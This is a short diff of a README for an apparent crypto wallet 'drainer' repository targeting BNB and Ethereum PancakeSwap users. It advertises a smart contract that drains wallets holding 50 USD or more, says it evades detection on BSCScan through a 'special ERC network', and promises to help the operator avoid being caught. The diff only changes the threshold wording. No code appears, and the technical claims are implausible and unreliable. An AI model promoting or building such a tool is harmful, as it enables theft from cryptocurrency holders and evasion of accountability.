tr4g1k0/bnb-eth-pancakeswap-drainer/README.md

 !!!!!THIS SMART CONTRACT IS ON A SPECIAL ERC NETWORK THAT FOWARDS IT TO YOUR ADDRESS ON THE REAL BSC CHAIN FOR STEALTH THIS CONTRACT WILL NOT SHOW UP ON BSCSCAN!!!!!

-THE CONTRACT WILL ONLY DRAIN WALLETS WITH 50 USDT or more for stealth
+THE CONTRACT WILL ONLY DRAIN WALLETS WITH 50 USD worth or more for stealth

 the smart contract will foward the data to you to prevent you from being caught